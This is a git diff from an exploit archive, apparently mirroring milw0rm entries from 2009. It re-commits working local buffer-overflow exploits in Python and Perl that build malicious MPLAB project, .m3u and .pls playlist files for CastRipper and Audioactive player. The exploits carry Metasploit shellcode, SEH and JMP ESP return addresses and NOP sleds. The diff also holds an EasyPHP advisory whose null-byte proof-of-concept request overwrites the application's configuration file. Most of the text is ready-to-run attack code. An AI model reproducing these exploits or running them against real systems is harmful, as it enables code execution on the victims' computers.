+"\x74\x65\x72\x5f\x6c\x6b\x72\x3d\x2a\x2e\x6c\x6b\x72\x0d\x0a\x5b" +"\x53\x55\x49\x54\x45\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x73\x75\x69" +"\x74\x65\x5f\x67\x75\x69\x64\x3d\x7b\x36\x42\x33\x44\x41\x41\x37" +"\x38\x2d\x35\x39\x43\x31\x2d\x34\x36\x44\x44\x2d\x42\x36\x41\x41" +"\x2d\x44\x42\x44\x41\x45\x34\x45\x30\x36\x34\x38\x34\x7d\x0d\x0a" 
+"\x73\x75\x69\x74\x65\x5f\x73\x74\x61\x74\x65\x3d\x0d\x0a\x5b\x54" +"\x4f\x4f\x4c\x5f\x53\x45\x54\x54\x49\x4e\x47\x53\x5d\x0d\x0a\x54" +"\x53\x7b\x42\x46\x44\x32\x37\x46\x42\x41\x2d\x34\x41\x30\x32\x2d" +"\x34\x43\x30\x45\x2d\x41\x35\x45\x35\x2d\x42\x38\x31\x32\x46\x33" +"\x45\x37\x37\x30\x37\x43\x7d\x3d\x2f\x6f\x22") + +header2 = ( +"\x2e\x63\x6f\x66\x22\x0d\x0a\x54\x53\x7b\x41\x44\x45\x39\x33\x41" +"\x35\x35\x2d\x43\x37\x43\x37\x2d\x34\x44\x34\x44\x2d\x41\x34\x42" +"\x41\x2d\x35\x39\x33\x30\x35\x46\x37\x44\x30\x33\x39\x31\x7d\x3d" +"\x0d\x0a") + + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +shellcode=( +"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79" +"\x1f\x8c\x11\x83\xeb\xfc\xe2\xf4\x85\xf7\xc8\x11\x79\x1f\x07\x54" +"\x45\x94\xf0\x14\x01\x1e\x63\x9a\x36\x07\x07\x4e\x59\x1e\x67\x58" +"\xf2\x2b\x07\x10\x97\x2e\x4c\x88\xd5\x9b\x4c\x65\x7e\xde\x46\x1c" +"\x78\xdd\x67\xe5\x42\x4b\xa8\x15\x0c\xfa\x07\x4e\x5d\x1e\x67\x77" +"\xf2\x13\xc7\x9a\x26\x03\x8d\xfa\xf2\x03\x07\x10\x92\x96\xd0\x35" +"\x7d\xdc\xbd\xd1\x1d\x94\xcc\x21\xfc\xdf\xf4\x1d\xf2\x5f\x80\x9a" +"\x09\x03\x21\x9a\x11\x17\x67\x18\xf2\x9f\x3c\x11\x79\x1f\x07\x79" +"\x45\x40\xbd\xe7\x19\x49\x05\xe9\xfa\xdf\xf7\x41\x11\xef\x06\x15" +"\x26\x77\x14\xef\xf3\x11\xdb\xee\x9e\x7c\xed\x7d\x1a\x1f\x8c\x11") + +buff = "\x41" * (226-len(shellcode)) +next_seh = "\x74\xc9\x41\x42" +seh = "\x12\x13\x40\x00" #p/p/r MPLAB.exe +nops1 = "\x90"*20 +nops2 = "\x90"*28 +mshellcode = "\xE9\x47\xFF\xFF\xFF" #welli 3liya :p + +exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2 + +try: + out_file = open("exploit.mcp",'w') + out_file.write(exploit) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-05-11] diff --git a/platforms/windows/local/8657.txt b/platforms/windows/local/8657.txt index 39273a654..d97003ed9 100755 --- a/platforms/windows/local/8657.txt 
+++ b/platforms/windows/local/8657.txt 
@@ -1,41 +1,40 @@
-
-Bug : Arbitrary Modify Configuration File
-Vendor : EasyPHP
-Vendor URI : http://sourceforge.net/projects/quickeasyphp/
-Product : EasyPHP 2.0
-Author : Zigma [zigmatn @ gmail.com]
- http://NullArea.NET
-
-Description :
-
-EasyPHP is a WAMP software bundle that installs web server services onto the Windows computer and allows quick-and-easy development of PHP and MySQL on a localhost (also known as 127.0.0.1).
-The package includes an Apache server, a MySQL database, and the PHP extension.
-
-[+] Analyis :
-
-A slight look on i18n.inc
-
-if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
-{
- $fp = fopen($filename, "r");
- $ini_contents = fread($fp, filesize($filename));
- fclose($fp);
- $ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); <--
- $fp = fopen($filename, "w");
- fputs($fp,$ini_contents);
- fclose($fp);
- Header("Location: " . $_SERVER['PHP_SELF']);
- exit;
-}
-
-EasyPHP does not verify user Input ( Lang parameter ) wich leads to arbitrary overwrite EasyPHP configuration file (EasyPHP.ini) .
-
-[+] Proof Of Concept :
-
-The request :
-
-http://localhost/index.php?lang=fr%00Lang=Overwritten
-
-Results in overwriting EasyPHP.ini Adding the string "Lang=Overwritten".
-
-# milw0rm.com [2009-05-11]
+Bug : Arbitrary Modify Configuration File
+Vendor : EasyPHP
+Vendor URI : http://sourceforge.net/projects/quickeasyphp/
+Product : EasyPHP 2.0
+Author : Zigma [zigmatn @ gmail.com]
+ http://NullArea.NET
+
+Description :
+
+EasyPHP is a WAMP software bundle that installs web server services onto the Windows computer and allows quick-and-easy development of PHP and MySQL on a localhost (also known as 127.0.0.1).
+The package includes an Apache server, a MySQL database, and the PHP extension.
+
+[+] Analyis :
+
+A slight look on i18n.inc
+
+if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
+{
+ $fp = fopen($filename, "r");
+ $ini_contents = fread($fp, filesize($filename));
+ fclose($fp);
+ $ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); <--
+ $fp = fopen($filename, "w");
+ fputs($fp,$ini_contents);
+ fclose($fp);
+ Header("Location: " . $_SERVER['PHP_SELF']);
+ exit;
+}
+
+EasyPHP does not verify user Input ( Lang parameter ) wich leads to arbitrary overwrite EasyPHP configuration file (EasyPHP.ini) .
+
+[+] Proof Of Concept :
+
+The request :
+
+http://localhost/index.php?lang=fr%00Lang=Overwritten
+
+Results in overwriting EasyPHP.ini Adding the string "Lang=Overwritten".
+
+# milw0rm.com [2009-05-11]
diff --git a/platforms/windows/local/8660.pl b/platforms/windows/local/8660.pl
index f5126d907..52536a54f 100755
--- a/platforms/windows/local/8660.pl
+++ b/platforms/windows/local/8660.pl
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-#[+]--------------------------------------------------------------------------------------[+]#
-# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
-# By [0]x80->[H]4x²0r
-# hashteck[at]Gmail[dot]com
-# From Morocco
-#[+]--------------------------------------------------------------------------------------[+]#
-# program : CastRipper
-# version : 2.50.70
-# download : http://www.mini-stream.net/castripper/
-#[+]--------------------------------------------------------------------------------------[+]#
-# Tested Under Win$hit Vista Pro
-# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)#
-# NOTE : if you want to use it under an other version of Win32 use jmpfind.exe
-#( avalaible on the net) to find a matching address with which you'll overwrite your EIP .
-#[+]--------------------------------------------------------------------------------------[+]#
-##################################### Proud to be Moroccan ###################################
-
-
-$junk="\x41" x 17379;
-$eip="\xF8\x03\xB1\x76"; # 0x76B103F8 jmp ESP - Kernel32.dll
-$nops="\x46" x 10;
-# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-$shell =
-"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
-"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
-"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
-"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
-"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
-"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
-"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
-"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
-"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
-"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
-
-# | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------|
-open(m3u,">>Exploit.m3u");
-print m3u $junk.$eip.$nops.$shell;
-print "[+] Done !! [+]";
-close(m3u);
-
-# milw0rm.com [2009-05-12]
+#!/usr/bin/perl
+#[+]--------------------------------------------------------------------------------------[+]#
+# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
+# By [0]x80->[H]4x²0r
+# hashteck[at]Gmail[dot]com
+# From Morocco
+#[+]--------------------------------------------------------------------------------------[+]#
+# program : CastRipper
+# version : 2.50.70
+# download : http://www.mini-stream.net/castripper/
+#[+]--------------------------------------------------------------------------------------[+]#
+# Tested Under Win$hit Vista Pro
+# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)#
+# NOTE : if you want to use it under an other version of Win32 use jmpfind.exe
+#( avalaible on the net) to find a matching address with which you'll overwrite your EIP .
+#[+]--------------------------------------------------------------------------------------[+]#
+##################################### Proud to be Moroccan ###################################
+
+
+$junk="\x41" x 17379;
+$eip="\xF8\x03\xB1\x76"; # 0x76B103F8 jmp ESP - Kernel32.dll
+$nops="\x46" x 10;
+# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+$shell =
+"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
+"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
+"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
+"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
+"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
+"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
+"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
+"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
+"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
+"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
+
+# | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------|
+open(m3u,">>Exploit.m3u");
+print m3u $junk.$eip.$nops.$shell;
+print "[+] Done !! [+]";
+close(m3u);
+
+# milw0rm.com [2009-05-12]
diff --git a/platforms/windows/local/8661.pl b/platforms/windows/local/8661.pl
index aabec9817..3f6196cbb 100755
--- a/platforms/windows/local/8661.pl
+++ b/platforms/windows/local/8661.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit
-# Exploited By Stack
-# first exploiter :d http://www.milw0rm.com/exploits/8660 bien jouer :d frero
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $Bof="\x41" x 26328;
-my $ret="\x7D\xBC\x01\x10"; # Universall Ret Adress jmp esp 1001BC7D
- # Executable modules, item 6
- # Base=10000000
- # Size=0006F000 (454656.)
- # Entry=10023AAC CRutilit.
- # Name=CRutilit
- # Path=C:\Program Files\CastRipper\CRutility03.dll
-my $nop="\x90" x 20;
-open(MYFILE,'>>sploit.m3u');
-print MYFILE $Bof.$ret.$nop.$shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-05-12]
+#!/usr/bin/perl
+# CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit
+# Exploited By Stack
+# first exploiter :d http://www.milw0rm.com/exploits/8660 bien jouer :d frero
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $Bof="\x41" x 26328;
+my $ret="\x7D\xBC\x01\x10"; # Universall Ret Adress jmp esp 1001BC7D
+ # Executable modules, item 6
+ # Base=10000000
+ # Size=0006F000 (454656.)
+ # Entry=10023AAC CRutilit.
+ # Name=CRutilit
+ # Path=C:\Program Files\CastRipper\CRutility03.dll
+my $nop="\x90" x 20;
+open(MYFILE,'>>sploit.m3u');
+print MYFILE $Bof.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-05-12]
diff --git a/platforms/windows/local/8662.py b/platforms/windows/local/8662.py
index 387d2bb55..e947e1063 100755
--- a/platforms/windows/local/8662.py
+++ b/platforms/windows/local/8662.py
@@ -1,50 +1,50 @@ -#!/usr/bin/python -print "**************************************************************************" -print " CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit\n" -print " Refer: http://www.milw0rm.com/exploits/8660\n" -print " Exploit code: super-cristal\n" -print " Tested on: Windows XP Pro SP3\n" -print " Greetings to:" -print " His0k4, all friends & muslims HaCkers(dz),snakespc.com\n" -print "**************************************************************************" - - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x53\x4b\x38\x4e\x57" -"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48" -"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" -"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x38" -"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x44" -"\x4b\x58\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38" -"\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x37" -"\x4e\x30\x4b\x48\x42\x54\x4e\x50\x4b\x38\x42\x57\x4e\x31\x4d\x4a" -"\x4b\x58\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b" -"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x35\x41\x43" -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37" -"\x42\x55\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" 
-"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x46" -"\x4e\x46\x43\x36\x42\x50\x5a") - -buff = "\x41" * 17367 -buff += "\x7D\xBC\x01\x10" # universal jmp esp -buff += "\x90"*20 -buff += shellcode - -try: - out_file = open("exploit.m3u",'w') - out_file.write(buff) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-05-12] +#!/usr/bin/python +print "**************************************************************************" +print " CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit\n" +print " Refer: http://www.milw0rm.com/exploits/8660\n" +print " Exploit code: super-cristal\n" +print " Tested on: Windows XP Pro SP3\n" +print " Greetings to:" +print " His0k4, all friends & muslims HaCkers(dz),snakespc.com\n" +print "**************************************************************************" + + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x53\x4b\x38\x4e\x57" +"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48" +"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58" +"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" +"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x38" +"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x44" +"\x4b\x58\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38" +"\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" 
+"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x37" +"\x4e\x30\x4b\x48\x42\x54\x4e\x50\x4b\x38\x42\x57\x4e\x31\x4d\x4a" +"\x4b\x58\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b" +"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x35\x41\x43" +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37" +"\x42\x55\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" +"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x46" +"\x4e\x46\x43\x36\x42\x50\x5a") + +buff = "\x41" * 17367 +buff += "\x7D\xBC\x01\x10" # universal jmp esp +buff += "\x90"*20 +buff += shellcode + +try: + out_file = open("exploit.m3u",'w') + out_file.write(buff) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-05-12] diff --git a/platforms/windows/local/8663.pl b/platforms/windows/local/8663.pl index acd6ee30d..4a2a90468 100755 --- a/platforms/windows/local/8663.pl +++ b/platforms/windows/local/8663.pl 
@@ -1,29 +1,29 @@ -#!/usr/bin/perl -# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit -# Exploited By : zAx -# ThE-zAx@HoTMaiL.CoM -print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n"; -print "Exploited By : zAx"; -print "Contact at : ThE-zAx@HoTMaiL.CoM"; -$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://"; -$junk = "\x41" x 26369; -$eip="\x7D\xBC\x01\x10"; # Universal -$nopsled = "\x90" x 10; -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -$shellcode = -"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88". -"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89". -"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85". -"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1". -"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa". -"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8". -"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47". -"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4". -"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8". -"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc"; -open(zax,">>zAx.pls"); -print zax $header.$junk.$eip.$nopsled.$shellcode; -print "[+] Done !! [+]"; -close(zax); - -# milw0rm.com [2009-05-12] +#!/usr/bin/perl +# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit +# Exploited By : zAx +# ThE-zAx@HoTMaiL.CoM +print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n"; +print "Exploited By : zAx"; +print "Contact at : ThE-zAx@HoTMaiL.CoM"; +$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://"; +$junk = "\x41" x 26369; +$eip="\x7D\xBC\x01\x10"; # Universal +$nopsled = "\x90" x 10; +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +$shellcode = +"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88". 
+"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89". +"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85". +"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1". +"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa". +"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8". +"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47". +"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4". +"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8". +"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc"; +open(zax,">>zAx.pls"); +print zax $header.$junk.$eip.$nopsled.$shellcode; +print "[+] Done !! [+]"; +close(zax); + +# milw0rm.com [2009-05-12] diff --git a/platforms/windows/local/8670.php b/platforms/windows/local/8670.php index 09586c5b0..42bb856bd 100755 --- a/platforms/windows/local/8670.php +++ b/platforms/windows/local/8670.php @@ -1,58 +1,58 @@ - - -# milw0rm.com [2009-05-13] + + +# milw0rm.com [2009-05-13] diff --git a/platforms/windows/local/8698.pl b/platforms/windows/local/8698.pl index 9cb29704d..3c0bbf7e7 100755 --- a/platforms/windows/local/8698.pl +++ b/platforms/windows/local/8698.pl 
@@ -1,30 +1,30 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
-# Greetz to all my friends
-# From EGYPT
-##################################################################
-my $bof="\x41" x 224;
-my $ret="\xed\x1e\x94\x7c"; # JMP ESP ntdll.dll
-my $nop="\x90" x 24;
-##################################################################
-# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
-"\xac\xdf\x53\x83\xeb\xfc\xe2\xf4\xda\x44\x9b\x53\x26\xac\x54\x16".
-"\x1a\x27\xa3\x56\x5e\xad\x30\xd8\x69\xb4\x54\x0c\x06\xad\x34\x1a".
